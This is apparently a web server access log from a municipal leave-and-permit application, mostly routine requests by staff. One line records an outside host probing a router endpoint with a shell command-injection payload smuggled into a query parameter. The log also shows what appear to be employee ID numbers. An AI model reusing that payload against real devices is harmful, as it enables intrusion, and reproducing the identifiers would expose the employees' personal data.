190.171.144.234 - - [27/Nov/2024:09:03:36 -0300] "GET /cormun/servlet/permisogoce?DSP,13945792,P,20241125144549, HTTP/1.1" 200 6725
181.212.40.185 - - [27/Nov/2024:09:03:50 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7112
190.171.144.234 - - [27/Nov/2024:09:03:51 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14234
181.212.40.185 - - [27/Nov/2024:09:03:57 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18efa1139b13799dfc63488e79e96ef6b0fc013f95c25168ab400d92062f5cf226c766bb1290cb7c2b1729bb8f7d30dedf39,gx-no-cache=1732709044371 HTTP/1.1" 200 85
181.212.40.185 - - [27/Nov/2024:09:03:59 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [27/Nov/2024:09:04:03 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18ef0f0fc2694173e893a6cd7d09db4942e0914852cb0006f84b2ffea373079566a1d17e39a66c4883df090b2ce953983744,gx-no-cache=1732709050832 HTTP/1.1" 200 48
190.171.144.234 - - [27/Nov/2024:09:04:05 -0300] "GET /cormun/servlet/permisogoce?DSP,13945792,P,20241125144549, HTTP/1.1" 200 6725
190.171.144.234 - - [27/Nov/2024:09:04:29 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14234
181.212.40.185 - - [27/Nov/2024:09:04:31 -0300] "POST /cormun/servlet/permisogoce?971de4bd52d6306e81962b97a4d5dae5,INS,0,,,,gx-no-cache=1732709056583 HTTP/1.1" 200 93
181.212.40.185 - - [27/Nov/2024:09:04:31 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
181.212.40.185 - - [27/Nov/2024:09:04:31 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 19545
190.171.144.234 - - [27/Nov/2024:09:04:39 -0300] "GET /cormun/servlet/permisogoce?UPD,13945792,P,20241125144549, HTTP/1.1" 200 6924
190.171.144.234 - - [27/Nov/2024:09:04:40 -0300] "GET /cormun/servlet/permisogoce?abb058b753dfb273aa35178fc307e5fb1eb66a18a0975b233226dee369970069df8229655863c091cd0cf93839c80e6f99481379631d7a27a440d7e14609ffc9b721f4a4f04259573bb6e8876fa73339,gx-no-cache=1732709086926 HTTP/1.1" 200 83
190.171.144.234 - - [27/Nov/2024:09:04:48 -0300] "GET /cormun/servlet/permisogoce?abb058b753dfb273aa35178fc307e5fbe1428a3b5e1a9eeb941e2d1b79484248b02e7d5292feeed945c0caed5ca208d96559dfc06a0a28e4b06d0d612de727c4,gx-no-cache=1732709094839 HTTP/1.1" 200 48
190.171.144.234 - - [27/Nov/2024:09:04:57 -0300] "POST /cormun/servlet/permisogoce?f69f6ee7b7f4ae34f6711faeb4459d8e,UPD,13945792,P,20241125144549,,gx-no-cache=1732709094864 HTTP/1.1" 200 93
190.171.144.234 - - [27/Nov/2024:09:04:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1033
190.171.144.234 - - [27/Nov/2024:09:04:58 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 14227
190.171.144.234 - - [27/Nov/2024:09:05:05 -0300] "GET /cormun/servlet/apermisogoceprn?13945792,P,20241125144549,PU HTTP/1.1" 200 1658
185.224.128.67 - - [27/Nov/2024:09:07:15 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60kill+1%60) HTTP/1.1" 404 1013
181.212.40.185 - - [27/Nov/2024:09:07:49 -0300] "GET /cormun/servlet/trpermisosadjuntos?14200276,20241127090347,P, HTTP/1.1" 200 6551
181.212.40.185 - - [27/Nov/2024:09:07:51 -0300] "GET /cormun/servlet/permisosadjuntos?INS,14200276,P,20241127090347,, HTTP/1.1" 200 5875
181.212.40.185 - - [27/Nov/2024:09:07:51 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.82 - - [27/Nov/2024:09:11:14 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.149.82 - - [27/Nov/2024:09:11:15 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
190.171.149.82 - - [27/Nov/2024:09:11:19 -0300] "POST /cormun/servlet/hlogin?ea371dfe43e5b96d0fef8f28c24733b9,gx-no-cache=1732709485119 HTTP/1.1" 200 90
190.171.149.82 - - [27/Nov/2024:09:11:19 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.149.82 - - [27/Nov/2024:09:11:19 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3934
190.171.149.82 - - [27/Nov/2024:09:11:22 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10698
190.171.149.82 - - [27/Nov/2024:09:11:31 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6797
190.171.149.82 - - [27/Nov/2024:09:12:01 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88f2ba931493b385212bcb25f22acd29e292629d851789fbb26a8f2cbe9d6d9ee868ac4bf7ca19cee812e6fa6aa9bd7447e,gx-no-cache=1732709526911 HTTP/1.1" 200 81
190.171.149.82 - - [27/Nov/2024:09:12:02 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.82 - - [27/Nov/2024:09:12:09 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88fe3758e5ce0713cff71edcaec51e15c0979bad6fb999bce322fdd49dc086c9c07f8ceb6dc0b34958e637feb409b2e2c50,gx-no-cache=1732709535193 HTTP/1.1" 200 48
181.212.40.185 - - [27/Nov/2024:09:12:23 -0300] "POST /cormun/servlet/permisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,INS,14200276,P,20241127090347,, HTTP/1.1" 200 116
181.212.40.185 - - [27/Nov/2024:09:12:23 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
181.212.40.185 - - [27/Nov/2024:09:12:24 -0300] "GET /cormun/servlet/trpermisosadjuntos?14200276,20241127090347,P, HTTP/1.1" 200 7075
181.212.40.185 - - [27/Nov/2024:09:12:30 -0300] "POST /cormun/servlet/trpermisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,14200276,20241127090347,P,,gx-no-cache=1732709557662 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:09:12:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 982
181.212.40.185 - - [27/Nov/2024:09:12:30 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 19542
190.171.149.82 - - [27/Nov/2024:09:12:32 -0300] "POST /cormun/servlet/permisogoce?ea371dfe43e5b96d0fef8f28c24733b9,INS,0,,,,gx-no-cache=1732709538575 HTTP/1.1" 200 93
190.171.149.82 - - [27/Nov/2024:09:12:32 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.149.82 - - [27/Nov/2024:09:12:32 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10899
190.171.143.82 - - [27/Nov/2024:09:12:35 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 7555
181.212.40.185 - - [27/Nov/2024:09:12:38 -0300] "GET /cormun/servlet/trpermisosadjuntos?14200276,20241127090347,P, HTTP/1.1" 200 7072
190.171.143.82 - - [27/Nov/2024:09:12:39 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
190.171.143.82 - - [27/Nov/2024:09:12:39 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 7549
190.171.143.82 - - [27/Nov/2024:09:12:41 -0300] "POST /cormun/servlet/hlogin?38894f8adf205ae4ad97720e9282ac2d,gx-no-cache=1732709568784 HTTP/1.1" 200 90
190.171.143.82 - - [27/Nov/2024:09:12:41 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.143.82 - - [27/Nov/2024:09:12:42 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 11280
190.171.149.82 - - [27/Nov/2024:09:12:44 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6797
181.212.40.185 - - [27/Nov/2024:09:12:49 -0300] "POST /cormun/servlet/trpermisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,14200276,20241127090347,P,,gx-no-cache=1732709575974 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:09:12:49 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 982
181.212.40.185 - - [27/Nov/2024:09:12:49 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 19542
190.171.143.82 - - [27/Nov/2024:09:12:53 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15622
190.171.149.82 - - [27/Nov/2024:09:12:55 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88f0eef4971dae1f51f8b42a37363970fc96dfc33c228980be909a579b4e14dd76ebc0218d495ed55f0c8ed3eaa5a867376,gx-no-cache=1732709581488 HTTP/1.1" 200 84
181.212.40.185 - - [27/Nov/2024:09:13:02 -0300] "POST /cormun/servlet/trpermisosgoce?971de4bd52d6306e81962b97a4d5dae5,gx-no-cache=1732709578888 HTTP/1.1" 200 16864
181.212.40.185 - - [27/Nov/2024:09:13:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [27/Nov/2024:09:13:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.40.185 - - [27/Nov/2024:09:13:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [27/Nov/2024:09:13:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.149.82 - - [27/Nov/2024:09:13:08 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88feea8a0c022f429122e945aef4a91c5bd324aed4326821186f24c4ca76df24d150f7beaf43e5de4c6700f8cc0593d1617,gx-no-cache=1732709593814 HTTP/1.1" 200 47
181.212.40.185 - - [27/Nov/2024:09:13:09 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7112
181.212.40.185 - - [27/Nov/2024:09:13:15 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18ef9d496f374a34ad00852d9ebebd2af4e9013f95c25168ab400d92062f5cf226c766bb1290cb7c2b1729bb8f7d30dedf39,gx-no-cache=1732709602561 HTTP/1.1" 200 89
181.212.40.185 - - [27/Nov/2024:09:13:17 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [27/Nov/2024:09:13:27 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18efbb11126d9034c159a0ceae5d123ce3d3409b6ec13665c09a84aa7f3ad219a2fb5bae0dcc52913c7894dc0ab94bacf4fa,gx-no-cache=1732709614783 HTTP/1.1" 200 48
190.171.149.82 - - [27/Nov/2024:09:13:28 -0300] "POST /cormun/servlet/permisogoce?ea371dfe43e5b96d0fef8f28c24733b9,INS,0,,,,gx-no-cache=1732709599215 HTTP/1.1" 200 93
190.171.149.82 - - [27/Nov/2024:09:13:28 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.149.82 - - [27/Nov/2024:09:13:28 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 11143
190.171.149.82 - - [27/Nov/2024:09:13:41 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6798
181.212.40.185 - - [27/Nov/2024:09:13:52 -0300] "POST /cormun/servlet/permisogoce?971de4bd52d6306e81962b97a4d5dae5,INS,0,,,,gx-no-cache=1732709630469 HTTP/1.1" 200 93
181.212.40.185 - - [27/Nov/2024:09:13:52 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1030
181.212.40.185 - - [27/Nov/2024:09:13:52 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1732709578888 HTTP/1.1" 200 19618
190.171.149.82 - - [27/Nov/2024:09:13:53 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88ff48b1e53660fc580340d26cbe1e6eb756dfc33c228980be909a579b4e14dd76ebc0218d495ed55f0c8ed3eaa5a867376,gx-no-cache=1732709638500 HTTP/1.1" 200 79
181.212.40.185 - - [27/Nov/2024:09:14:03 -0300] "GET /cormun/servlet/trpermisosadjuntos?19360063,20241127091305,P, HTTP/1.1" 200 6573
181.212.40.185 - - [27/Nov/2024:09:14:05 -0300] "GET /cormun/servlet/permisosadjuntos?INS,19360063,P,20241127091305,, HTTP/1.1" 200 5878
181.212.40.185 - - [27/Nov/2024:09:14:05 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.82 - - [27/Nov/2024:09:14:07 -0300] "GET /cormun/servlet/permisogoce?a3c939f4f81b5b9cee6b68dc462bf88f6262aedc4852f822c73c793c168c6a40b9da7d382888381a6d35209867f58ca50f7beaf43e5de4c6700f8cc0593d1617,gx-no-cache=1732709653583 HTTP/1.1" 200 48
181.212.40.185 - - [27/Nov/2024:09:14:16 -0300] "POST /cormun/servlet/permisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,INS,19360063,P,20241127091305,, HTTP/1.1" 200 116
181.212.40.185 - - [27/Nov/2024:09:14:16 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
181.212.40.185 - - [27/Nov/2024:09:14:16 -0300] "GET /cormun/servlet/trpermisosadjuntos?19360063,20241127091305,P, HTTP/1.1" 200 7090
181.212.40.185 - - [27/Nov/2024:09:14:24 -0300] "POST /cormun/servlet/trpermisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,19360063,20241127091305,P,,gx-no-cache=1732709671262 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:09:14:24 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1003
181.212.40.185 - - [27/Nov/2024:09:14:24 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1732709578888 HTTP/1.1" 200 19615
190.171.149.82 - - [27/Nov/2024:09:14:38 -0300] "POST /cormun/servlet/permisogoce?ea371dfe43e5b96d0fef8f28c24733b9,INS,0,,,,gx-no-cache=1732709675535 HTTP/1.1" 200 93
190.171.149.82 - - [27/Nov/2024:09:14:38 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.149.82 - - [27/Nov/2024:09:14:39 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 11407
181.212.40.185 - - [27/Nov/2024:09:14:45 -0300] "POST /cormun/servlet/trpermisosgoce?971de4bd52d6306e81962b97a4d5dae5,gx-no-cache=1732709578888,gx-no-cache=1732709673840 HTTP/1.1" 200 16914
190.171.149.82 - - [27/Nov/2024:09:14:49 -0300] "GET /cormun/servlet/apermisogoceprn?18375973,P,20241125110320,PU HTTP/1.1" 200 1655
190.171.149.82 - - [27/Nov/2024:09:14:49 -0300] "GET /cormun/servlet/apermisogoceprn?18375973,P,20241125110320,PU HTTP/1.1" 200 1654
181.212.40.185 - - [27/Nov/2024:09:15:02 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7134
190.171.149.74 - - [27/Nov/2024:09:15:06 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6037
190.171.149.74 - - [27/Nov/2024:09:15:06 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.149.74 - - [27/Nov/2024:09:15:10 -0300] "POST /cormun/servlet/hlogin?5252d3d9ea23fc1b70b1ae83ac8dff00,gx-no-cache=1732709715322 HTTP/1.1" 200 90
190.171.149.74 - - [27/Nov/2024:09:15:10 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.149.74 - - [27/Nov/2024:09:15:10 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15372
181.212.40.185 - - [27/Nov/2024:09:15:10 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18ef03f1166295130d7f0467b0c7288c543c013f95c25168ab400d92062f5cf226c766bb1290cb7c2b1729bb8f7d30dedf39,gx-no-cache=1732709717578 HTTP/1.1" 200 79
190.171.149.74 - - [27/Nov/2024:09:15:13 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15371
190.171.149.74 - - [27/Nov/2024:09:15:14 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6849
181.212.40.185 - - [27/Nov/2024:09:15:18 -0300] "GET /cormun/servlet/permisogoce?67bb91ce6139bdb202c6d3f03c3d18ef86974237693eadcd03b46beff75d90c029d7889e41528fac46a63a5886fd09d15bae0dcc52913c7894dc0ab94bacf4fa,gx-no-cache=1732709725415 HTTP/1.1" 200 47
190.171.149.82 - - [27/Nov/2024:09:15:28 -0300] "GET /cormun/servlet/apermisogoceprn?15525635,P,20241125110345,PU HTTP/1.1" 200 1657
190.171.149.82 - - [27/Nov/2024:09:15:28 -0300] "GET /cormun/servlet/apermisogoceprn?15525635,P,20241125110345,PU HTTP/1.1" 200 1653
181.212.40.185 - - [27/Nov/2024:09:15:33 -0300] "POST /cormun/servlet/permisogoce?971de4bd52d6306e81962b97a4d5dae5,INS,0,,,,gx-no-cache=1732709736173 HTTP/1.1" 200 93
181.212.40.185 - - [27/Nov/2024:09:15:33 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1030
181.212.40.185 - - [27/Nov/2024:09:15:33 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1732709578888 HTTP/1.1" 200 19679
190.171.143.90 - - [27/Nov/2024:09:15:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1717
190.171.143.90 - - [27/Nov/2024:09:15:55 -0300] "POST /cormun/servlet/hlogin?550171f3e2954a13932d3247adc75d82,gx-no-cache=1732709761469 HTTP/1.1" 200 90
190.171.143.90 - - [27/Nov/2024:09:15:55 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.171.143.90 - - [27/Nov/2024:09:15:55 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4320
190.171.143.90 - - [27/Nov/2024:09:15:59 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13033
181.212.40.185 - - [27/Nov/2024:09:16:01 -0300] "GET /cormun/servlet/trpermisosadjuntos?18105044,20241127091458,P, HTTP/1.1" 200 6564
190.171.149.82 - - [27/Nov/2024:09:16:01 -0300] "GET /cormun/servlet/apermisogoceprn?9523283,P,20241127091337,PU HTTP/1.1" 200 1655
190.171.149.82 - - [27/Nov/2024:09:16:01 -0300] "GET /cormun/servlet/apermisogoceprn?9523283,P,20241127091337,PU HTTP/1.1" 200 1653
181.212.40.185 - - [27/Nov/2024:09:16:03 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18105044,P,20241127091458,, HTTP/1.1" 200 5868
181.212.40.185 - - [27/Nov/2024:09:16:03 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.149.74 - - [27/Nov/2024:09:16:21 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c51741727f34884796b1a5812b252d0d3af7cb7127bf94aaa60a850527c3f4c74e0804ae298597e3bfc09d30adc35185b7,gx-no-cache=1732709786728 HTTP/1.1" 200 82
190.171.149.74 - - [27/Nov/2024:09:16:23 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [27/Nov/2024:09:16:23 -0300] "POST /cormun/servlet/permisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,INS,18105044,P,20241127091458,, HTTP/1.1" 200 116
181.212.40.185 - - [27/Nov/2024:09:16:23 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1038
181.212.40.185 - - [27/Nov/2024:09:16:24 -0300] "GET /cormun/servlet/trpermisosadjuntos?18105044,20241127091458,P, HTTP/1.1" 200 7059
190.171.149.74 - - [27/Nov/2024:09:16:28 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c5ca02f70c5c3b51d9e82a389c2c552b0e6b2e640eb35884dde082bad28720900554a4ac1321d294c24c4f0c44af12f455,gx-no-cache=1732709792937 HTTP/1.1" 200 48
190.171.149.82 - - [27/Nov/2024:09:16:35 -0300] "GET /cormun/servlet/apermisogoceprn?18646940,P,20241127091128,PU HTTP/1.1" 200 1659
190.171.149.82 - - [27/Nov/2024:09:16:35 -0300] "GET /cormun/servlet/apermisogoceprn?18646940,P,20241127091128,PU HTTP/1.1" 200 1657
190.171.149.74 - - [27/Nov/2024:09:16:51 -0300] "POST /cormun/servlet/permisogoce?5252d3d9ea23fc1b70b1ae83ac8dff00,INS,0,,,,gx-no-cache=1732709794860 HTTP/1.1" 200 93
190.171.149.74 - - [27/Nov/2024:09:16:51 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1012
190.171.149.74 - - [27/Nov/2024:09:16:51 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15614
190.171.149.82 - - [27/Nov/2024:09:16:52 -0300] "GET /cormun/servlet/apermisogoceprn?8721006,P,20241127091240,PU HTTP/1.1" 200 1646
190.171.149.82 - - [27/Nov/2024:09:16:52 -0300] "GET /cormun/servlet/apermisogoceprn?8721006,P,20241127091240,PU HTTP/1.1" 200 1647
190.171.149.74 - - [27/Nov/2024:09:16:57 -0300] "GET /cormun/servlet/apermisogoceprn?26775334,P,20241127091510,PU HTTP/1.1" 200 1655
181.212.40.185 - - [27/Nov/2024:09:17:54 -0300] "POST /cormun/servlet/trpermisosadjuntos?971de4bd52d6306e81962b97a4d5dae5,18105044,20241127091458,P,,gx-no-cache=1732709881630 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:09:17:54 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1003
181.212.40.185 - - [27/Nov/2024:09:17:54 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1732709578888 HTTP/1.1" 200 19676
181.212.40.185 - - [27/Nov/2024:09:18:09 -0300] "POST /cormun/servlet/trpermisosgoce?971de4bd52d6306e81962b97a4d5dae5,gx-no-cache=1732709578888,gx-no-cache=1732709883472 HTTP/1.1" 200 16980
190.171.149.82 - - [27/Nov/2024:09:22:02 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9867
190.171.149.74 - - [27/Nov/2024:09:24:52 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15609
190.171.149.74 - - [27/Nov/2024:09:24:54 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.74 - - [27/Nov/2024:09:25:13 -0300] "POST /cormun/servlet/trpermisosgoce?5252d3d9ea23fc1b70b1ae83ac8dff00,,gx-no-cache=1732710318173 HTTP/1.1" 200 3938
190.171.149.74 - - [27/Nov/2024:09:25:24 -0300] "POST /cormun/servlet/trpermisosgoce?5252d3d9ea23fc1b70b1ae83ac8dff00,,gx-no-cache=1732710329507 HTTP/1.1" 200 5466
190.171.149.74 - - [27/Nov/2024:09:25:34 -0300] "POST /cormun/servlet/trpermisosgoce?5252d3d9ea23fc1b70b1ae83ac8dff00,,gx-no-cache=1732710339252 HTTP/1.1" 200 5230
190.171.149.74 - - [27/Nov/2024:09:25:34 -0300] "POST /cormun/servlet/trpermisosgoce?5252d3d9ea23fc1b70b1ae83ac8dff00,,gx-no-cache=1732710339396 HTTP/1.1" 200 5211
190.171.142.18 - - [27/Nov/2024:09:25:40 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.142.18 - - [27/Nov/2024:09:25:40 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1733
190.171.142.18 - - [27/Nov/2024:09:25:43 -0300] "POST /cormun/servlet/hlogin?4ed46c956649756a3a0e955655666871,gx-no-cache=1732710476529 HTTP/1.1" 200 90
190.171.142.18 - - [27/Nov/2024:09:25:43 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.142.18 - - [27/Nov/2024:09:25:43 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4383
190.171.142.18 - - [27/Nov/2024:09:25:47 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12000
190.171.142.18 - - [27/Nov/2024:09:27:45 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [27/Nov/2024:09:27:46 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 19524
190.171.149.74 - - [27/Nov/2024:09:27:48 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 8039
190.171.149.74 - - [27/Nov/2024:09:27:54 -0300] "POST /cormun/servlet/trpermisosgoce?5252d3d9ea23fc1b70b1ae83ac8dff00,,gx-no-cache=1732710479244 HTTP/1.1" 200 15773
190.171.149.74 - - [27/Nov/2024:09:27:56 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6850
190.171.142.18 - - [27/Nov/2024:09:28:05 -0300] "POST /cormun/servlet/trlicencias?4ed46c956649756a3a0e955655666871,,gx-no-cache=1732710618405 HTTP/1.1" 200 18367
190.171.142.18 - - [27/Nov/2024:09:28:05 -0300] "GET /cormun/static/Resources/PXToolsGridNext.gif HTTP/1.1" 200 369
190.171.142.18 - - [27/Nov/2024:09:28:06 -0300] "GET /cormun/static/Resources/PXToolsGridLast.gif HTTP/1.1" 200 370
190.171.149.74 - - [27/Nov/2024:09:28:09 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c5723494ca53ab51e55c5dd84e09c039ffcc89650fb27b855049e2ce671058939621042587958c0c17345f0f10db5429ba,gx-no-cache=1732710494767 HTTP/1.1" 200 70
190.171.149.74 - - [27/Nov/2024:09:28:17 -0300] "GET /cormun/servlet/permisogoce?26cf79cad235d664b21bb5695d3f06c57763f16b4b319d940dd881b1c228d4982bf07924cdc14e8373eac29168b187299bc46ec7bbd534fbc84944ad9aeea64e,gx-no-cache=1732710502366 HTTP/1.1" 200 47
190.171.149.74 - - [27/Nov/2024:09:28:21 -0300] "POST /cormun/servlet/permisogoce?5252d3d9ea23fc1b70b1ae83ac8dff00,INS,0,,,,gx-no-cache=1732710505701 HTTP/1.1" 200 93
190.171.149.74 - - [27/Nov/2024:09:28:21 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1012
190.171.149.74 - - [27/Nov/2024:09:28:21 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 18617
190.171.149.74 - - [27/Nov/2024:09:28:23 -0300] "GET /cormun/servlet/apermisogoceprn?9055439,P,20241127092752,PU HTTP/1.1" 200 1642
190.171.142.18 - - [27/Nov/2024:09:28:29 -0300] "GET /cormun/servlet/alicenciaprn?15434714,L,20241126000000,PU HTTP/1.1" 200 1544
190.171.152.114 - - [27/Nov/2024:09:29:16 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7226
190.171.152.114 - - [27/Nov/2024:09:29:23 -0300] "GET /cormun/servlet/permisogoce?4b8595c31c51d86f7a85a4ca64e1f780579cb0ba66b613aa046f6129917ae7f5618e86d476d29d9133a336d964ff141fb4f85942c269bbb19849250cee489f4c,gx-no-cache=1732710569894 HTTP/1.1" 200 82
190.171.152.114 - - [27/Nov/2024:09:29:25 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.152.114 - - [27/Nov/2024:09:29:30 -0300] "GET /cormun/servlet/permisogoce?4b8595c31c51d86f7a85a4ca64e1f780f0ac6abac4741e2e1165b3755e659c78bd6bffa8a3b324902fa0b8f866e8c58b624b3d073c75c8bd2f4ae65219861cf6,gx-no-cache=1732710576395 HTTP/1.1" 200 48
190.171.152.114 - - [27/Nov/2024:09:29:34 -0300] "POST /cormun/servlet/permisogoce?43b33b5b6348d58fe7d6b40368ca6727,INS,0,,,,gx-no-cache=1732710580142 HTTP/1.1" 200 93
190.171.152.114 - - [27/Nov/2024:09:29:34 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.152.114 - - [27/Nov/2024:09:29:34 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15514
190.171.152.114 - - [27/Nov/2024:09:29:37 -0300] "GET /cormun/servlet/apermisogoceprn?10477100,P,20241127092912,PU HTTP/1.1" 200 1663
190.171.154.42 - - [27/Nov/2024:09:31:46 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
190.171.154.42 - - [27/Nov/2024:09:31:57 -0300] "POST /cormun/servlet/hlogin?b781b61a4102ce7720b7b665ffd450ff,gx-no-cache=1732710723766 HTTP/1.1" 200 90
190.171.154.42 - - [27/Nov/2024:09:31:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 946
190.171.154.42 - - [27/Nov/2024:09:31:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3880
190.171.154.42 - - [27/Nov/2024:09:31:59 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11743
